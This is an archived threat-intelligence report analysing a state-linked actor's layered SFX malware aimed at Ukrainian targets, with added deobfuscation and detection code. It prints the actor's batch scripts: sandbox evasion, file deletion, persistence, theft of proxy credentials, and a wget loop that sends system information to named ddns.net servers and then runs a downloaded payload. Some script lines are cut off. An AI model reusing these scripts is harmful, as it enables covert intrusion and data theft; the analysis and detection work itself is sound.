{
	"id": "56b5a64d-eab3-4cb0-ad68-4600be7ad7d9",
	"created_at": "2026-04-06T00:09:30.817355Z",
	"updated_at": "2026-04-10T03:35:41.857007Z",
	"deleted_at": null,
	"sha1_hash": "9cd65052f9dc3d8fddfaaa426a551635a78d0d73",
	"title": "Multi-Layered SFX in Recent Campaigns Target Ukraine – Red Alert",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 217094,
	"plain_text": "Multi-Layered SFX in Recent Campaigns Target Ukraine – Red Alert\r\nArchived: 2026-04-05 18:19:22 UTC\r\nOverview\r\nUnlike other state-sponsored threat actors, SectorC08 appears to be concerned with a single target: Ukraine. Artifacts of their likely activity have been found as far back as 2013, and up to today their modus operandi in the initial stages of an operation has not changed much.\r\nWe analyzed over 50 of their executable malware files found very recently in order to look at similarities, differences, and outliers. We found that while a few samples still used SectorC08’s older executable structure, in which the batch script is split out into many files (e.g. Wariables.cmd) or shipped together with a decoder executable and an encoded executable, most of them followed the structure detailed below.\r\nExample of a Typical First Stage Structure\r\n(a8f849d536481d7d8a0fa59a7bcc03dd3387ab4cc14c0342371ae295817f505c)\r\nAll samples which we can confirm arrived in May and June used the same structure, described below: a 7zSFX archive which opens a password-protected WinRARSFX archive, which in turn runs a version of wget to download the third-stage malware, another SFX archive carrying a remote-administration tool such as UltraVNC.\r\nFake Documents\r\nSome of the malware samples we found contained an embedded fake document pertaining to Ukrainian issues. We observed six such embedded fake documents, which were sometimes reused against different targets. These documents are opened by the embedded batch file from inside the 7zSFX archive environment.\r\nExample of files embedded in a 7zSFX archive. 
“6710” is the embedded fake document here.\r\nThe batch file is always the file SectorC08 configures the 7zSFX archive to run on execution; it distracts the victim by opening the fake document while the malicious activity proceeds.\r\nhttps://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/\r\nPage 1 of 14\n\n18974.cmd – Commands Related to Opening Fake Document\r\n…\r\nset CHeqCJB=Document\r\n…\r\nset EhFWXVK=6710\r\n…\r\ncopy /y “%EhFWXVK%” “%CHeqCJB%.docx”\r\n…\r\n“%CD%\\%CHeqCJB%.docx”\r\n…\r\nThe fake documents are always in Ukrainian and pertain to Ukrainian legal, political, military or police issues.\r\nBy comparing the date in the document content with the malware’s internal versioning code (described later), and drawing on our knowledge of the malware’s earlier versioning codes and dates, we can conclude that when the versioning code corresponds to a date it is at least a roughly accurate timestamp, which lets us build a partial timeline of events.\r\nFor example, the fake military document dated 21st May 2019 was found in three separate malware samples, where the version code “21.05” (21st May) appeared twice and “22.05” (22nd May) appeared once. Another example is the undated fake police message, where the version code “24.05” (24th May) appeared three times and “prok” and “27” appeared once each.\r\nBasic Anti-Analysis\r\nAt the start of this batch script, the malware looks for Wireshark and Process Explorer using the TaskList command. If either is found, the script jumps to a label “exit” that is never defined, so cmd.exe aborts the batch file with a “cannot find the batch label” error. 
Due to an error in their programming logic, however, the check does not do everything the attacker intends: %ErrorLevel% is expanded once, after the For loop has finished, so only the result of the last iteration (the procexp.exe lookup) is ever tested, and a running Wireshark on its own is never noticed.\r\n18974.cmd – Basic Anti-Analysis\r\n…\r\nFor %%g In (wireshark procexp) do (\r\nTaskList /FI “ImageName EQ %%g.exe” | Find /I “%%g.exe”\r\n)\r\nIf %ErrorLevel% NEQ 1 goto exit\r\n…\r\nWhile the Wireshark and Process Explorer checks were consistent across their malware samples, we also found isolated instances where the malware additionally checked for HttpAnalyzer (9dbc77844fc3ff3565970cb09d629a710fdec3065b6e4c37b20a889c716c53bf), and an older sample from a different SectorC08 malware family which also checked whether the machine’s username was a known sandbox username such as “TEQUILABOOMBOOM” or “MALWARETEST” (034fed63fc366ff3cf0137caced77a046178926c63faf1a8cd8db9d185d40821).\r\nstatecrypt.cmd – Checking for usernames such as “TEQUILABOOMBOOM”\r\n…\r\nSet ProcessName=wireshark.exe\r\nTaskList /FI “ImageName EQ %ProcessName%” | Find /I “%ProcessName%”\r\nIf %ErrorLevel% NEQ 1 goto hotlog\r\nset name=%username%\r\nif “%name%”==”MALTEST” goto hotlog\r\nif “%name%”==”MALWARETEST” goto hotlog\r\nif “%name%”==”TEQUILABOOMBOOM” goto hotlog\r\nif “%name%”==”SANDBOX” goto hotlog\r\nif “%name%”==”VIRUS” goto hotlog\r\nif “%name%”==”MALWARE” goto hotlog\r\nif “%name%”==”MALWARES” goto hotlog\r\nif “%name%”==”TEST” goto hotlog\r\nif “%name%”==”TROYAN” goto hotlog\r\n…\r\n:hotlog\r\nping 127.0.0.1\r\ntaskkill /f /im mshta.exe\r\nfor /r “%TEMP%” %%d in (.) 
do dir /b “%%~d” | find /v “”\u003enul || rd /s /q “%%~d”\r\ndel /f /q “%CD%\\*.vbs”\r\ndel /f /q “%CD%\\*.exe”\r\ndel /f /q “%CD%\\*.cmd”\r\nexit\r\nFirst Stage Persistence\r\nIn this sample, the first stage 7zSFX archive contains the first stage batch script (filename: “18974.cmd”), a shortcut that runs “%USERPROFILE%\\winver.exe -pgblfhsuyjqyst” (filename: “11666”), the fake document (6710), and the second stage WinRARSFX archive (filename: “5610”). In the first stage batch script, we can see that the second stage executable is copied to “%USERPROFILE%\\winver.exe” and the shortcut file is copied to “%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winver.lnk” for persistence, so the SFX is launched again with its password at every logon.\r\n18974.cmd – Commands Related to Persistence\r\n…\r\nset KsEEKky=”%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\”\r\n…\r\nset “EbnMNIJ=%USERPROFILE%”\r\n…\r\nset UDWwujG=winver\r\n…\r\nset GLUymyw=5610\r\n…\r\ncopy /y “%GLUymyw%” “%EbnMNIJ%\\%UDWwujG%.exe”\r\n…\r\ncopy /y “11666” %KsEEKky%\\%UDWwujG%.lnk\r\n…\r\nSample Second Stage\r\n(EE623D8FCF366249A381B0CB50CE6295E913F88CB0F9CB4D8116C0F3D9FA16F2)\r\nIn many recent cases, their second stage is a password-protected WinRARSFX which contains a VBS file whose only purpose is to run batch commands via WScript, a .cmd batch file containing the commands to be run, and a renamed version of wget.\r\nThe second stage WinRARSFX archive\r\nIn this example, we see that the password used to open the second stage is “uyjqystgblfhs”. While SectorC08 sometimes changes the WinRARSFX password (or simply uses another, unprotected 7zSFX archive), we observed this particular password being used at least 11 times across their various malware samples. 
This shows that while they have likely automated parts of their process for building these batch scripts, a lot of it is still completely manual.\r\n18974.cmd – Commands Related to Second Stage Password\r\n…\r\nset “EbnMNIJ=%USERPROFILE%”\r\n…\r\nset UDWwujG=winver\r\n…\r\nset GLUymyw=5610\r\n…\r\nset cjhIZDS=uyjqystgblfhs\r\n…\r\ntaskkill /f /im %UDWwujG%.exe\r\n…\r\ncopy /y “%GLUymyw%” “%EbnMNIJ%\\%UDWwujG%.exe”\r\n…\r\nstart “” %EbnMNIJ%\\%UDWwujG%.exe -p%cjhIZDS%\r\n…\r\nSecond Stage Persistence and Wget\r\nAfter the first stage, the chain always eventually acts as a downloader in the second stage, launching one of various versions of wget to download the third stage.\r\n11009.cmd – Full Contents (the repeated lines that only shuffle the SgJyn, SbTrL, whAWq, GEdaT, atpVW and xGAmD variables are junk padding interleaved with the real commands)\r\n@echo off\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nchcp 1251\u003eNUL\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nsetlocal enabledelayedexpansion\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset “qwoMlMx=HKCU\\Software”\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset “CnGKehh=Microsoft\\Windows”\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset “XCEEJVi=CurrentVersion\\Internet Settings”\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset GMXXMeP=”%qwoMlMx%\\%CnGKehh%\\%XCEEJVi%”\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nFor /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyServer”`) do set BtRtCGM=%%o\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset 
SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nFor /F “UseBackQ Tokens=2*” %%u In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyUser”`) do set tBUCICm=%%v\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nFor /F “UseBackQ Tokens=2*” %%n In (`Reg.exe Query %GMXXMeP%^|Find /I “ProxyPass”`) do set BwtKgWA=%%o\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nFor /F “skip=1 Tokens=4*” %%u In (‘vol c:’) Do set KsEEKky=%%u\r\nif %KsEEKky%==is (\r\nFor /F “skip=1 Tokens=5*” %%v In (‘vol c:’) Do set KsEEKky=%%v\r\n)\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset EbnMNIJ=22.05\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset per_24=%computername%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset DOHVFwJ=0\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nsysteminfo \u003e UDWwujG\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nFOR /F “tokens=*” %%n IN (UDWwujG) do @IF NOT i%%n==i set CHeqCJB=!CHeqCJB!%%n+###\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset NFJOtqt=%computername%_%KsEEKky:-=%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset eNSzFCv=http\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset FbNZKeg=wincreator\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset HIngDXg=ddns.net\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset 
EhFWXVK=%eNSzFCv%://%FbNZKeg%.%HIngDXg%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset GLUymyw=jasfix\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset “cjhIZDS=%APPDATA%\\Microsoft\\IE”\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset ViKDbBD=MicrosoftCreate\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset BDwSMJD=weristotal\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset NOdKmih=winusers\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset flkpgez=bitvers\r\nset per_23=”Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64”\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nMD “%cjhIZDS%”\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\ncopy “%ViKDbBD%.exe” “%cjhIZDS%\\%BDwSMJD%.exe” /y\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nschtasks /Create /SC MINUTE /MO 30 /F /tn %BDwSMJD%_%KsEEKky:-=%_01 /tr “%cjhIZDS%\\%BDwSMJD%.exe -b -c -t 5 ‘%eNSz\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nschtasks /Create /SC MINUTE /MO 32 /F /tn %BDwSMJD%_%KsEEKky:-=%_02 /tr “%USERPROFILE%\\%NOdKmih%.exe”\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif defined BtRtCGM (\r\nschtasks /Create /SC MINUTE /MO 31 /F /tn %BDwSMJD%_%KsEEKky:-=%_03 /tr “%cjhIZDS%\\%BDwSMJD%.exe -e http_proxy=htt\r\n)\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\n:KTmZDZR\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset 
SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nset /a xTBHxRg=39*%RANDOM%/32768\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nping -n 10 127.0.0.1\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\ntimeout /t %xTBHxRg%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\ntaskkill /f /im %ViKDbBD%.exe\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\n%ViKDbBD%.exe --user-agent=%per_23% --post-data=”versiya=%EbnMNIJ: =%\u0026comp=%per_24%\u0026id=%NFJOtqt: =%\u0026sysinfo=%CHeqCJB\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nif defined BtRtCGM (\r\n%ViKDbBD%.exe --user-agent=%per_23% -e http_proxy=http://%BtRtCGM% --proxy-user=%tBUCICm% --proxy-password=%BwtKgWA%\r\n)\r\nping -n 5 127.0.0.1\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nset /a zDGBFmh=0\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nfor %%o in (%GLUymyw%.exe) do (set /a zDGBFmh=%%~Zo)\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nif %zDGBFmh% GEQ 50002 call :FdLHKss\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset /a xTBHxRg=30*%RANDOM%/32768\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\nping -n 5 microsoft.com\r\nset SbTrL=%SgJyn%*whAWq-%atpVW%\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\ngoto KTmZDZR\r\nif %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%\r\n:FdLHKss\r\nstart “” “%GLUymyw%.exe”\r\nif SbTrL==GEdaT set xGAmD=%whAWq%_SgJyn\r\nping -n 11 google.com.ua\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\ndel /q /f “%GLUymyw%.exe”\r\nif SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq\r\nexit /b\r\nset SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%\r\nFrom the script above, we can see that MicrosoftCreate.exe (a version of wget) is copied to “%APPDATA%\\Microsoft\\IE\\weristotal.exe”. The loop at :KTmZDZR then sleeps for a random number of seconds (up to 38), runs the wget POST, and checks the size of the jasfix.exe it is meant to retrieve with the %%~Z modifier; only once that file is at least 50002 bytes (presumably so that a saved error page is never executed) is it started and then deleted. 
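The listing above is only readable once the padding is dropped and the split-up variables are put back together. The following Python script is an added example, written for this page and not part of the original report or of the actor’s tooling: it walks a constructed excerpt of 11009.cmd in order, expands %VAR% and %VAR:old=new% references the way cmd.exe does, evaluates the if guards (so the `if SgJyn==GEdaT set …` padding never fires), and emits only the commands that remain, with the download base URL and the victim id recovered from the variable table. The host values it seeds (computer name, profile paths, and the C: volume serial that the real script obtains from vol c:) are assumptions.

```python
import re

# Constructed excerpt of the obfuscated second-stage script (11009.cmd) shown
# above, curly quotes straightened. Lines that only shuffle SgJyn/SbTrL/whAWq/
# GEdaT/atpVW are the obfuscator's padding; the truncated wget line is left out.
SAMPLE_SCRIPT = '''@echo off
if SgJyn==GEdaT set SgJyn=%whAWq%*SbTrL-whAWq
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
chcp 1251>NUL
set SbTrL=SgJyn+whAWq-GEdaT*atpVW-%SgJyn%
set \"qwoMlMx=HKCU\\Software\"
set \"CnGKehh=Microsoft\\Windows\"
set \"XCEEJVi=CurrentVersion\\Internet Settings\"
set GMXXMeP=\"%qwoMlMx%\\%CnGKehh%\\%XCEEJVi%\"
For /F \"UseBackQ Tokens=2*\" %%n In (`Reg.exe Query %GMXXMeP%^|Find /I \"ProxyServer\"`) do set BtRtCGM=%%o
if %SbTrL% LEQ SgJyn set whAWq=SgJyn-atpVW-%SbTrL%
set NFJOtqt=%computername%_%KsEEKky:-=%
set eNSzFCv=http
set FbNZKeg=wincreator
set HIngDXg=ddns.net
set EhFWXVK=%eNSzFCv%://%FbNZKeg%.%HIngDXg%
set \"cjhIZDS=%APPDATA%\\Microsoft\\IE\"
set ViKDbBD=MicrosoftCreate
set BDwSMJD=weristotal
set NOdKmih=winusers
MD \"%cjhIZDS%\"
copy \"%ViKDbBD%.exe\" \"%cjhIZDS%\\%BDwSMJD%.exe\" /y
schtasks /Create /SC MINUTE /MO 32 /F /tn %BDwSMJD%_%KsEEKky:-=%_02 /tr \"%USERPROFILE%\\%NOdKmih%.exe\"
'''

# Assumed host environment. KsEEKky is the C: volume serial the real script
# reads with a For /F over 'vol c:'; that loop is not in the excerpt, so seed it.
SAMPLE_ENV = {
    'COMPUTERNAME': 'WS-ACCOUNTING',
    'USERPROFILE': 'C:\\Users\\olena',
    'APPDATA': 'C:\\Users\\olena\\AppData\\Roaming',
    'KsEEKky': '1A2B-3C4D',
}

VAR_RE = re.compile(r'%([A-Za-z_][A-Za-z0-9_]*)(?::([^=%]*)=([^%]*))?%')
SET_RE = re.compile(r'^(?:if\s+(?P<cond>.+?)\s+)?set\s+(?P<rest>.+)$', re.I)
CMP_RE = re.compile(r'^(?:(?P<neg>not)\s+)?(?:defined\s+(?P<name>\S+)|'
                    r'(?P<a>\S+?)\s*(?P<op>==|EQU|NEQ|LSS|LEQ|GTR|GEQ)\s*(?P<b>\S+))$', re.I)

def expand(text, env):
    # %VAR% and %VAR:old=new%; an undefined name expands to nothing, as in a
    # batch file, and %%x for-variables are left untouched.
    def repl(m):
        value = env.get(m.group(1).upper(), '')
        if m.group(2) is not None:
            value = value.replace(m.group(2), m.group(3))
        return value
    return VAR_RE.sub(repl, text)

def compare(a, op, b):
    # cmd.exe semantics: == is a string test; EQU..GEQ compare as integers when
    # both sides are integers and as strings otherwise.
    if op == '==':
        return a == b
    try:
        a, b = int(a), int(b)
    except ValueError:
        pass
    return {'EQU': a == b, 'NEQ': a != b, 'LSS': a < b,
            'LEQ': a <= b, 'GTR': a > b, 'GEQ': a >= b}[op.upper()]

def guard_holds(cond, env, warnings):
    m = CMP_RE.match(cond.strip())
    if not m:
        # e.g. 'if %SbTrL% LEQ SgJyn' before SbTrL exists: cmd.exe reports a
        # syntax error here; record it and treat the guard as false.
        warnings.append('unparseable guard: if ' + cond)
        return False
    if m.group('name') is not None:
        result = m.group('name').upper() in env
    else:
        result = compare(m.group('a'), m.group('op'), m.group('b'))
    return result != bool(m.group('neg'))

def deobfuscate(script, seed_env):
    # One ordered pass: keep the variable table current and return
    # (real commands with variables resolved, final variable table, warnings).
    env = {k.upper(): v for k, v in seed_env.items()}
    commands, warnings = [], []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SET_RE.match(line)
        if not m or '=' not in m.group('rest'):
            commands.append(expand(line, env))
            continue
        if m.group('cond') and not guard_holds(expand(m.group('cond'), env), env, warnings):
            continue
        rest = m.group('rest')
        if rest.lower().startswith('/a '):
            rest = rest[3:].lstrip()            # set /a: kept as text, not evaluated
        if rest.startswith('\"'):
            rest = rest[1:].rsplit('\"', 1)[0]  # set \"NAME=VALUE\": quotes are not part of the value
        name, value = rest.split('=', 1)
        env[name.strip().upper()] = expand(value, env)
    return commands, env, warnings

if __name__ == '__main__':
    cmds, env, warns = deobfuscate(SAMPLE_SCRIPT, SAMPLE_ENV)
    print('\n'.join(cmds))
    print('download base:', env['EHFWXVK'], ' victim id:', env['NFJOTQT'])
    for w in warns:
        print('warning:', w)
```

Running it prints the handful of real commands (the Reg.exe query, MD, copy and schtasks lines, every %VAR% resolved) and http://wincreator.ddns.net as the assembled download base. The first `if %SbTrL% LEQ SgJyn` guard is reported as unparseable because SbTrL has not been set yet at that point, which is where cmd.exe itself reports a syntax error; the padding that follows never fires because its conditions compare unequal literal strings.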
A scheduled task then has this weristotal.exe download an EXE file from hxxp://bitvers[.]ddns[.]net/[computerinfo]/winusers.exe, and a second scheduled task executes what was downloaded. The download task runs every 30 minutes, which matters because SectorC08’s servers very often return an HTTP 403 Forbidden error instead of the requested file.\r\nSeparately, the original MicrosoftCreate.exe also attempts to download another executable, jasfix.exe in this case, from hxxp://wincreator[.]ddns[.]net/[computerinfo]/winusers.exe. While these two wget downloads target different DDNS hostnames, both resolve to the same IP addresses and serve the same file paths, so the second download is also a form of redundancy for SectorC08.\r\nTo identify victims, the fields sent in the wget POST include “comp” (the %computername% environment variable), “id” (the computer name joined to the C: volume serial number taken from the output of vol c:) and “sysinfo” (the entire output of the systeminfo command). All of this is sent in the clear over HTTP.\r\nAnother interesting area to note from how they run wget is the user-agent used and the “versiya” (version) field in the post-data. 
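Bringing the behaviours described so far together, the following Python is an added detection example written for this page (not part of the original report): it runs a handful of rules over constructed Sysmon-style process-creation and file-creation events. The rules encode the TaskList probe for analysis tools, the bare -p<password> SFX launch from the profile root, the .lnk dropped into the Startup folder, the minute-interval scheduled task pointing into %APPDATA%\\Microsoft\\IE, and the wget POST carrying the versiya, comp, id and sysinfo fields. The host, user, paths and benign control events are invented, and the rule thresholds are assumptions.

```python
ANALYSIS_TOOLS = ('wireshark', 'procexp', 'httpanalyzer')
STARTUP_DIR = '\\microsoft\\windows\\start menu\\programs\\startup\\'
BEACON_FIELDS = ('versiya=', 'comp=', 'id=', 'sysinfo=')

# Constructed events in the shape of Sysmon process-creation (ID 1) and
# file-creation (ID 11) records, modelled on the chain described above. Host,
# user and paths are invented; the last four events are benign controls.
SAMPLE_EVENTS = [
    {'type': 'ProcessCreate', 'image': 'C:\\Windows\\System32\\tasklist.exe',
     'cmdline': 'TaskList /FI \"ImageName EQ procexp.exe\"'},
    {'type': 'ProcessCreate', 'image': 'C:\\Users\\olena\\winver.exe',
     'cmdline': 'C:\\Users\\olena\\winver.exe -puyjqystgblfhs'},
    {'type': 'FileCreate', 'image': 'C:\\Windows\\System32\\cmd.exe',
     'target': 'C:\\Users\\olena\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\winver.lnk'},
    {'type': 'ProcessCreate', 'image': 'C:\\Windows\\System32\\schtasks.exe',
     'cmdline': 'schtasks /Create /SC MINUTE /MO 30 /F /tn weristotal_1A2B3C4D_01 '
                '/tr \"C:\\Users\\olena\\AppData\\Roaming\\Microsoft\\IE\\weristotal.exe -b -c -t 5\"'},
    {'type': 'ProcessCreate', 'image': 'C:\\Users\\olena\\AppData\\Local\\Temp\\MicrosoftCreate.exe',
     'cmdline': 'MicrosoftCreate.exe --user-agent=\"Mozilla/5.0 (Windows NT 10.0) Safari/537.36 OPR/54.0.2952.64\" '
                '--post-data=\"versiya=22.05&comp=WS-ACCOUNTING&id=WS-ACCOUNTING_1A2B3C4D&sysinfo=Host Name: WS-ACCOUNTING+###\" '
                'http://wincreator.ddns.net/'},
    {'type': 'ProcessCreate', 'image': 'C:\\Windows\\System32\\schtasks.exe',
     'cmdline': 'schtasks /Create /SC DAILY /ST 02:00 /tn NightlyBackup /tr \"C:\\Program Files\\Backup\\backup.exe\"'},
    {'type': 'ProcessCreate', 'image': 'C:\\Windows\\System32\\tasklist.exe',
     'cmdline': 'tasklist /FI \"STATUS eq running\"'},
    {'type': 'ProcessCreate', 'image': 'C:\\Program Files\\Git\\mingw64\\bin\\curl.exe',
     'cmdline': 'curl -s -A \"Mozilla/5.0\" https://example.org/'},
    {'type': 'FileCreate', 'image': 'C:\\Windows\\explorer.exe',
     'target': 'C:\\Users\\olena\\Desktop\\Report.lnk'},
]

def _cmd(ev):
    return ev.get('cmdline', '').lower()

def _image_is(ev, name):
    return ev['type'] == 'ProcessCreate' and ev['image'].lower().endswith('\\' + name)

def analysis_tool_probe(ev):
    # stage-1 batch: TaskList /FI for the image name of a known analysis tool
    cl = _cmd(ev)
    return _image_is(ev, 'tasklist.exe') and 'imagename eq' in cl and any(t in cl for t in ANALYSIS_TOOLS)

def sfx_password_launch(ev):
    # an exe in the profile root started with a bare -p<password> (WinRAR SFX switch)
    cl = _cmd(ev)
    if ev['type'] != 'ProcessCreate' or ' -p' not in cl:
        return False
    exe, _, password = cl.rpartition(' -p')
    return (exe.startswith('c:\\users\\') and exe.count('\\') == 3 and exe.endswith('.exe')
            and len(password) >= 8 and password.isalnum())

def startup_lnk_drop(ev):
    # a .lnk written into the per-user Startup folder (stage-1 persistence)
    target = ev.get('target', '').lower()
    return ev['type'] == 'FileCreate' and STARTUP_DIR in target and target.endswith('.lnk')

def minute_task_into_appdata(ev):
    # schtasks /SC MINUTE whose action lives under the roaming profile (stage-2 persistence)
    cl = _cmd(ev)
    return _image_is(ev, 'schtasks.exe') and '/sc minute' in cl and '/tr' in cl and '\\appdata\\roaming\\' in cl

def wget_post_beacon(ev):
    # wget-style --post-data/--user-agent switches carrying the family's victim-id fields
    cl = _cmd(ev)
    return (ev['type'] == 'ProcessCreate' and '--post-data=' in cl and '--user-agent=' in cl
            and sum(f in cl for f in BEACON_FIELDS) >= 2)

RULES = [analysis_tool_probe, sfx_password_launch, startup_lnk_drop,
         minute_task_into_appdata, wget_post_beacon]

def scan(events):
    # (rule name, evidence) for every event that trips a rule
    hits = []
    for ev in events:
        for rule in RULES:
            if rule(ev):
                hits.append((rule.__name__, ev.get('cmdline') or ev.get('target')))
    return hits

def verdict(events):
    # each rule alone is a heuristic (minute-interval tasks and tasklist filters
    # have benign uses); the chain is convincing once several stages fire together
    stages = sorted({name for name, _ in scan(events)})
    return ('likely SectorC08 SFX chain' if len(stages) >= 3 else 'inconclusive'), stages

if __name__ == '__main__':
    for name, evidence in scan(SAMPLE_EVENTS):
        print(name.ljust(26), evidence)
    print(verdict(SAMPLE_EVENTS))
```

On the sample, the five malicious events each trip exactly one rule and the four controls trip none, so verdict() calls the chain; fed only the controls it answers inconclusive. Because the beacon travels as plain HTTP, the same versiya/comp/id/sysinfo fields can be matched on the wire as well as on the host.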
